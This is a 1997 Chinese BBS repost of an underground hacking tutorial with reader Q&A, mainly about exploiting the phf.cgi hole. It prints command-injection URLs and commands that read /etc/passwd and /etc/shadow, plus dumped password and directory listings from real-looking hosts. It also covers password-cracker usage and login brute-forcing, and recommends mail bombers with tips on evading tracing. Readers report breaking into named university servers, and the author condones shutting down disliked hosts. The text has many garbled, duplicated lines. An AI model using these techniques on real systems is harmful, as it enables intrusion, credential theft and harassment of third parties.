发信人: Kissing.bbs@202.112.103.225 (Benny), 信区: cnhacker
标 题: 网络hacking入门(6)[转载]
发信站: 【真情流露】 (Fri Jun 27 07:53:13 1997)
转信站: Lilac!ustcnews!ustcnews!sjtunews!bupt
出 处: 202.112.103.225
这不是一个教学文件, 只是告诉你该如何破解系统,
好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完,
你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password
在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人,
而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到:
有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到....
看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话,
欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来,
先前我们已经尽了很大的努力将档 案放在国内 Server 中, 我想, 由 HiNet
连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在 .edu.tw 附近的,
欢迎来信要求 Mirror~~ 我很乐意将档案 Mirror 给你, 让其它网
友更方便取这些档案.
好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於 Hacker 方面的问题,
也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案,
甚至到现在还有很多的网友们询问甚麽 是 shadow password 的,
请各位多翻翻以前的文章吧!! 在 CGI Holes 方面的问题也很多, 所以在
这一篇之後我会找个时间写一写 System Holes #2
最近有许多软体更新了, 最令我们注意的当然就是 NT 4.0 罗,
因为它的更新肯定会带来很多的 人更新系统,
当然这样先进的作业系统我们还是很期待有人会很快的将它的 Bugs 找出来的啦!!
UpYours 这套重量级的 MailBomb 也出现的新的版本, 这次的 V4.0 Beta 2
经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用 Delphi
来设计, 使得安装更为方便, 不过 美中不足的是 beta2 的版本有些功能尚未改好,
光看到功能就让人哈翻了~~:) 这套 beta2 的版 本目前在我们的首页上可以找得到,
关於 MailBomb: 我们的首页上所提供的 MailBomb 仅供大家作为测试用,
请勿拿来开玩笑或是对别人 的信箱进行轰炸, 日前此类事件造成某些的 ISP 当机,
慎至还有导致 Mail Server 记忆体不足的情 况 (哪个人这麽狠??),
我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾 信件.
请大家以学习的心来使用这些 Bombs... 不要没事就拿来炸人好吗 ?? Then enjoy
请大家以学习的心来使用这些 Bombs... 不要没事就拿来炸人好吗 ?? Then enjoy
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
这次的主题想了好久, 一直都没有想到,
不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨 及漏X的风波之後,
在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd
root:x:0:1:0000-Admin(0000):/:/sbin/sh daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls: nadm:x:45:2::/usr/bin:/sbin/sh
listen:x:37:4:Network Admin:/usr/net/nls: nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh nobody:x:60001:60001:uid no
body:/: noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh ftp:x:106:101:Anonymous
FTP:/export/ftp:/bin/false hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow
但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上,
还是有很多的机器不理会这个指令, 不过当这 个指令生效, 但是你看到的却是一个
shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在 你的手中了,
total 466 -rw-r--r-- 1 root root 38 May 2 1996
#etcnamed.boot# -rw-r--r-- 1 root root 20579 May 1 1996
#sendmail.cf# drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 .. -rw-r--r-- 1
root root 2167 Aug 24 1995 DIR_COLORS -rw-r--r-- 1 root
root 15 May 1 1996 HOSTNAME -rw-r--r-- 1 root root
4 Feb 24 1993 NETWORKING -rw-r--r-- 1 root root 48 Dec 30
1994 NNTP_INEWS_DOMAIN -rw-r--r-- 1 root root 0 May 13
1994 at.deny drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
1994 at.deny drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r--r-- 1 root root 1212 Jul 10 1993 bootptab -rw-r--r--
1 root root 0 Feb 15 1994 csh.cshrc -rw-r--r-- 1 root
root 893 Apr 12 1996 csh.login drwxr-xr-x 2 root root
1024 Apr 16 1996 default -rw-r--r-- 1 root root 154 Aug 21
1994 exports -rw-r--r-- 1 root root 0 May 13 1995
fastboot -rw-r--r-- 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs -rw-r--r-- 1
root root 250 Dec 9 19:19 fstab -rw-r--r-- 1 root root
242 Dec 5 13:55 fstab~ -rw-r--r-- 1 root root 1915 Jan 27
07:46 ftpaccess -rw-r--r-- 1 root root 368 Aug 1 1994
ftpconversions -rw-r--r-- 1 root root 0 Aug 9 1994
ftpgroups -rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r--r-- 1 root root 501 Apr 26 1996 ftpusers -rw-r--r--
1 root root 76 Aug 21 1994 gateways -rw-r--r-- 1 root
root 669 May 19 1994 gettydefs -rw-r--r-- 1 root root
291 Jun 6 1996 group -rw-r--r-- 1 root root 27 Jul 7
1994 host.conf -rw-r--r-- 1 root root 628 Jul 12 1996 hosts
-rw-r--r-- 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r--r-- 1 root root 341 May 9 1996 hosts.deny
-rw-r--r-- 1 root root 313 Mar 16 1994 hosts.equiv
-rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd -rw-r--r--
-rw-r--r-- 1 root root 302 Sep 23 1993 hosts.lpd -rw-r--r--
1 root root 653 Apr 24 1996 hosts~ lrwxrwxrwx 1 root
root 1 Apr 12 1996 inet -> . -rw-r--r-- 1 root root
3677 Jan 6 10:20 inetd.conf -rw-r--r-- 1 root root 3664 Apr
23 1996 inetd.conf~ -rw-r--r-- 1 root root 2351 Apr 18 1996
inittab -rw-r--r-- 1 root root 2046 Jul 28 1994
inittab.gettyps.sample -rw-r--r-- 1 root root 27 Apr 17
12:43 issue -rw-r--r-- 1 root root 3 Apr 17 12:43
klogd.pid -rw-r--r-- 1 root root 1223 Apr 17 12:43
ld.so.cache -rw-r--r-- 1 root root 71 Aug 14 1995
ld.so.conf drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r--r-- 1 root root 479 Apr 13 1996 lilo.conf -rw-r--r--
1 root root 479 Apr 13 1996 lilo.conf.bak -rw-r--r-- 1 root
root 266 Apr 17 12:42 localtime -rw-r--r-- 1 root root
76873 Oct 17 1995 magic -r--r--r-- 1 root root 105 May 8
1994 mail.rc -rw-r--r-- 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs -rw-r--r-- 1
root root 151 Apr 17 20:43 mtab -rw-r--r-- 1 root root
833 Jun 29 1994 mtools -r--r--r-- 1 root root 974 Apr 17
11:48 named.boot -r--r--r-- 1 root root 2568 May 2 1996
named.boot,v -r--r--r-- 1 root root 764 Mar 8 16:54
named.boot.v1 -r--r--r-- 1 root root 813 Mar 17 08:45
named.boot.v1 -r--r--r-- 1 root root 813 Mar 17 08:45
named.boot.v2 -r--r--r-- 1 root root 521 Apr 18 1996
named.boot.~1.3~ -r--r--r-- 1 root root 566 Apr 19 1996
named.boot.~1.4~ -r--r--r-- 1 root root 566 Apr 19 1996
named.boot.~1.5~ -r--r--r-- 1 root root 707 Mar 5 08:32
named.boot.~1.6~ -rw-r--r-- 1 root root 566 Apr 19 1996
named.boot~ -rw-r--r-- 1 root root 235 May 1 1996 networks
-rw-r--r-- 1 root root 237 Apr 24 1996 networks~ -rw-r--r--
1 root root 0 May 8 1995 nntpserver -rw-r--r-- 1 root
1727 Apr 17 13:07 passwd -r--r--r-- 1 root root 1662 Apr 17
13:06 passwd- -rw-r--r-- 1 root root 1715 Apr 17 13:06
passwd.OLD -rw-r--r-- 1 root root 1494 Feb 12 14:22
passwd.old -rw-r--r-- 1 root root 1354 Jun 6 1996 passwd~
drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp -rw-r--r-- 1
root root 2240 May 20 1994 printcap -rw-r--r-- 1 root
root 1083 Apr 12 1996 profile -rw-r--r-- 1 root root
595 Aug 21 1994 protocols drwxr-xr-x 2 root root 1024 Jan 3
23:59 rc.d -rw-r--r-- 1 root root 41 May 1 1996
resolv.conf -rw-r--r-- 1 root root 65 Jan 31 1996
resolv.conf~ -rw-r--r-- 1 root root 743 Aug 1 1994 rpc
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty -r--r--r--
-rw-r--r-- 1 root root 87 Jun 6 1996 securetty -r--r--r--
1 root root 20579 May 1 1996 sendmail.cf -r--r--r-- 1 root
20541 Apr 13 1996 sendmail.cf~ -rw-r--r-- 1 root root 408
Apr 25 17:17 sendmail.st -rw-r--r-- 1 root root 5575 Aug 1
1994 services -rw-r--r-- 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel -rw-r--r-- 1
root root 314 Jan 10 1995 slip.hosts -rw-r--r-- 1 root
root 342 Jan 10 1995 slip.login -rw-r--r-- 1 root root
455 Aug 1 1994 snooptab -rw------- 1 root users 524 Jul 18
1996 ssh_host_key -rw-r--r-- 1 root users 327 Jul 18 1996
ssh_host_key.pub -rw------- 1 root users 512 Mar 10 09:03
ssh_random_seed -rw-r--r-- 1 root users 607 Jul 18 1996
sshd_config -rw-r----- 1 root root 501 Apr 26 1996
syslog.conf -rw-r--r-- 1 root root 3 Apr 17 12:43
syslog.pid -rw-r--r-- 1 root root 183942 Aug 9 1995 termcap
-rw-r--r-- 1 root root 126 Nov 24 1993 ttys lrwxrwxrwx 1
root root 13 Apr 12 1996 utmp -> /var/adm/utmp drwxr-xr-x
2 root root 1024 Aug 25 1995 vga lrwxrwxrwx 1 root root
13 Apr 12 1996 wtmp -> /var/adm/wtmp -rw-r--r-- 1 root root
76 May 8 1995 yp.conf.example lrwxrwxrwx 1 root root 7
76 May 8 1995 yp.conf.example lrwxrwxrwx 1 root root 7
上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location
就如同我们已经 Telnet 到 这台机器上, 下了: ls -l -a /etc 这个指令一样,
嗯... 也就是说....$^^*^$@@# OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的
passwd 档, 你一定会要抓真正的 shadow 档来作 "配对" 的动作... 所以呢, 下了
ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不 只是 /etc
这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls
这两个指令, 你 可以用更多的指令~~ 那麽还有甚麽作不到的呢 ???
我想可能还是有很多哩~~ 因为 phf.cgi 好像只 把你所下的指令丢给 shell
後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的
指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案,
然後用来代入 "<".. 嗯.. 最近很忙, 没有空作这些无聊事, 不过 phf.cgi
还真的蛮好玩的, 我已经试了好几台机器都可以看到 文件内容及档案, 目录...
经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi
也可以这样子 玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd
很容易就可以得手的喔~~ 对 了~ 不要乱搞政府机关 or 你们的学校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 "够快", 在
Encrypt 的速度及 比对的速度上实在快了很多,
但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack 不能跑,
我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套
Cracker 出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番,
原来一直声称速度上比 CJack14 还要快的 John, 经过实际上的测试,
总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支 程式是以 486
机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢
而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援,
当你下载解开後会发现里 面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在
DOS 下使用的版本, Win95,NT 下使用的 版本及 Unix 下使用的版本,
你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档),
经过测试速度上明显提升很多, 但是我不 敢讲它比 Jack 要快多少, 至少在我的
Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快 谁比较慢的感觉~~
当然这个程式里面只含了一个小小的字典档供你测试,
想要发挥它最大的效能还是先要有一个不错的 字典档,
想要发挥它最大的效能还是先要有一个不错的 字典档,
但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?),
至於如何操 作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~
Usage: john [flags] [passwd files] Flags: -pwfile:<file>[,..] specify
passwd file(s) -wordfile:<file> -stdin wordlist mode, read words from
<file> or stdin -rules enable rules for wordlist mode
-incremental[:<mode>] incremental mode [using john.ini entry <mode>]
-single single crack mode -external:<mode> external
mode, using john.ini entry <mode> -restore[:<file>] restore session
[from <file>] -makechars:<file> make a charset, <file> will be
overwritten -show show cracked passwords -test
perform a benchmark -users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count> crack salts with at least <count> accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout:<time> abort session after a period of <time> minutes
-list list each word -beep -quiet beep or
don't beep when a password is found -noname -nohash don't use
don't beep when a password is found -noname -nohash don't use
memory for login names or hash tables -des -md5 force DES or
有没有看到最後一行? 有 MD5 mode 的支援了哩~~~ 嗯.. 介绍完了! 当然!
这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试 者 archie
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
许多东西没有空整理, 但是还是收集了一部分的问答出来,
[Q0]我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.
[A0]如果你是想要我们站上 KOS 中的字典档, 那麽很报歉, 因为这东西只有本站的
KOS 中有包, 在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的,
其它程式相同), 这也 是为甚麽首页上的 KOS 如此大了~ 如果你所要的是 KOS
的程式, 那麽你可以到 www.yahoo.com 这个搜寻引擎中找 "globalkos" 这个字串,
会有很多地下站台的列表, 接著你就可以在这些地 方找一个连线速度较快的主机抓取
KOS 了~~
[Q1]我尝试用 NETTERM 及 LetMeIn 进入自己所建立的糸统(SCO Unix V). 1.
因为帐号是本人的,所以我将密码放於在字典档第三行内. 2.
在LetMeIn中选定我的字典档. 3. 在NETTERM中输入我的帐号,然後按输入键. 4.
在Password 的出现後回到LetMeIn. 5. 按Start Break. 6. 当Delay
Time到了,键盘上的"NumLock"闪过不停, 不过,过了第三行(猜想 ...
很久)也没有反应.老是停在Password这个浮标傍. 7.
当再选LetMeIn後看见字典档内的字逐一出现於最低的行内. 这好像没有按输入键.
请替我解答,可以麽? 还想问问在那里可找到新的LetMeIn 及ClayMore版本 多谢帮忙.
[A1] 1. 连上主机, 待 user: 出现时不用输入你的 user id. 2. 启动 LetMeIn 1.0
选定字典档 3. 在 Setup Keys 中输入你的 User ID 并加上一个 '~' 号(代表 Enter
4. 在 After Keys 中输入 '~' 号, 表示密码输入完也要按 Enter. 5. 按下 Start
Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm) 程式视窗,
ps... 以上.. 更正一下你的操作方式, 并请如果弄懂了 LetMeIn 的操作
方式时帮我写一下说明... 因为有太多人的操作都错了~~ 不晓得是不
是我的说明写得太差了哩 ??? LetMeIn 及 ClayMore 目前都未出新版本, LetMeIn
***
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!
[A2]KaBoom 3.0 经测试无法 Fake IP, 所以很可能会被查出来~~~ 不过要看 isp 配
不配合抓~~~ 也就是说因为拨接是动态 Ip, 较不容易查出(需透过 ISP)...但是如
[Q3]那麽有没有完全不会被查出的email bomber呢?:-) [A3]Windows 上的
AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般 之匿名信件,
或是你可找 Unix 上的Bomb Script..在 Unix 上炸... 再不.. 就试 装 UpYours
*** [Q4]I can't get the email bomb files except the kabomb..Can you help me
solve this problem? [A4]You can download it from my site. If there's some
*** [Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack
files. Can you tell where I can get or put the file in your homepage?
Thanks you for you attention.. [A5]对~ 经过连结测试该 Server
好像已经没有回应了, 目前已将 Global KOS 档 案整理好放置於首页上供大家下载,
原先是遵重作者的反应不得放连结的, 现 在由於该 Server 停掉了,
*** [Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢
*** [Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢
? [A6]You can use deshadow like program to De-Shadow the shadowed file. Or
you can use 'ypcat ' command to view the shadowed file. But almost ISP have
[Q7]我个ISP 用 SUN/OS , □D Sercuity 好劲o架 ! 我想睇□D档案时 , 会出现
Permission Denied , 我咪用 More / Less ! 然後用 ftp 想睇 , 用<!cat> 又唔准
! get file 都唔得 ! 我知□个Passwd 档摆系边都罗唔到 ! □请问
你又有无办法去罗□个档案啊 ! [A7]SUN OS ?? You should to check that system
again and tell me what version is it ? And you should check what ftp deamon
and what http deamon and sendmail version. You should check everything
about that server and try to found every hole would be in that system. And
try to get into the system. After you get in. get more information from
[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用□ !
我Upload 晒所有档案上去ISP Server 度 ! 然後就按 cc -o guess getpwdent.c
<-例如 □就 话我D规格错误 ! 搅到我用唔到 ! [A8]some ISP did not support c
[Q9]点样o既档案先可以系 SUN / OS 度用嫁 ? 我搅o黎搅去都整唔到执行档 !
咪就系 Guess 个程式罗 ! [A9]Sun OS always use shadow program. And the
shadowed file may not found in /etc directory, And may called '.shadow'.
shadowed file may not found in /etc directory, And may called '.shadow'.
[Q10]Global Kos 个Server 系咪有问题啊 ? 我上极去都上唔到啊 !
如果唔介意可唔可以 Attach个档案俾我啊 ? [A10]There's a little problem to
that server. and i think it have been shut-down a while. So i will be put
[Q11]Crack Jack 1.4 系唔系可以系 Sun/Os Or Unix 度用o架 ?
我有个朋友叫我用□系个 Server 做Crack Password ! 但系我就唔知点样可以用DOS
o既 *.exe 档系SUN/Os OR UNIX 度执行 ! [A11]CJack is running under dos mode.
And it could not run under unix mode. So if you want crack some password
file. FTP it and put it into a dos OS machine. Run CJack!
当然如果你坚持要在 Unix 系统下跑的话, 还是有这种软体 的, 最近新版的 John
the Ripper V1.4 就有附 Source Code 可以让你在你的主机 上面 Compiler....
*** [Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:
我使用 " John the Ripper V1.0 " 来crack一个名叫 "passwd"的密码档,
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.
您能帮小弟找出原因吗? 画面如下: C:\Hacker>john -beep -w:123.txt passwd John
the Ripper Version 1.0 Copyright (c) 1996 by Solar Designer Loaded 0
accounts with 0 different salts C:\Hacker>
accounts with 0 different salts C:\Hacker>
123.txt是"字典档"(其实是四,五十个ID); passwd则是我们的"目标:密码档.
[A12]很正确的指令, 不过 0 accounts with 0 different salts 就有点怪了~~~
据我的判断你的 passwd 档是 shadow 过的档, 没有用~~~~ 所以 John 找不到
"有效的" 资料来判读~~~ 新版的 John 有一个 UnShadow.exe 的档案, 据说可
用来组合 shadow 及 passwd 使其还原, 不过前提还是要两个档都抓到, 如果
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解 shadow..
[Q13]您听过一个叫: LANWATCH 的软体吗?
我听说它可以:过滤(拦截)Internet上的封包 资料,并可"监视"使用者的一举一动?!
哇!!!太帅了!您有它的相关资料吗? [A13]No~~ 没玩过~~ 不过你是用拨接上线吗 ???
[Q14]我这里有个
浏览器的Bomb(用java写的).据我自己(太牺牲了...)的测试,不论你是
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完
为止!!! :-P 不知您有无兴趣想要看看? [A14]我也有个可 FORMAT C: 的 JAVA...
不过没用就是了~~ 哈哈~ 这种东西少玩.... 我宁愿多破几间站台~~~ 嘻:::::::
快把 Java Option 关掉吧! 免得以後看我的 Page 会 Formatting ?? <--
*** [Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^
*** [Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^
根据您提供的方法,成功的取得 Linux.xxxxxxx.xxxx.xxx.tw 的 /etc/passwd 并找出
n 个 password ..... 但我在 tknet.tku.edu.tw 却碰了大钉子 ...:( 他们的
/etc/passwd 是 shadows 的, 我猜真正的 password 可能在/etc/master.passwd ,
但我没权限读取它 .... 经尝试了您网页提供的 3 个 Unix & Linux 的漏洞仍无效.
不知您有没有方法解决被 shadow 的 passwd....?? 提供一个帐号您可进去看 ...
login: ****** password: **** (这是淡大的密码格 式: 4位数字) 另,在 bbs 的
security 版有人提出现在的 www cracker 法:
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在 phf ,
------ 我们的首页上日前更新後增加一个网友交流板,
这个板的目的是让网友们可以在上面作些讨论, 如果 你常上我们的首页,
请看一下板上有没有问题是你能够回答的? 如果有也请不吝啬的发言, 造福大家 喔~~
网友交流板 需要你的支持~~
------ 再次重申, Crack 别人站台之後不要破坏别人站台中的资料,
此篇文章仅作为教育目的, 不主张你随 便入侵他人主机.... (高-Net 还是除外)...
请勿将这类技术使用於破坏上 (又... 如果第三次世界 大战开打,
你可以任意破坏敌国的电脑网路... 我全力支持),
最严重的情况(如果你真的很讨厌该主 机的话)... 就将它 Shut Down.... 好了!
别太暴力了!
My Mail Address: coolfire@cyberspace.org 或是写到
fetag.cyberspace.org (回信较快) Home Page: www.showtower.com.tw/~fetag 中的
Hackker&Mailer 区
--
※ 来源:·真情流露 bbs.crspd.bupt.edu.cn·[FROM: 202.112.102.190]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:426.701毫秒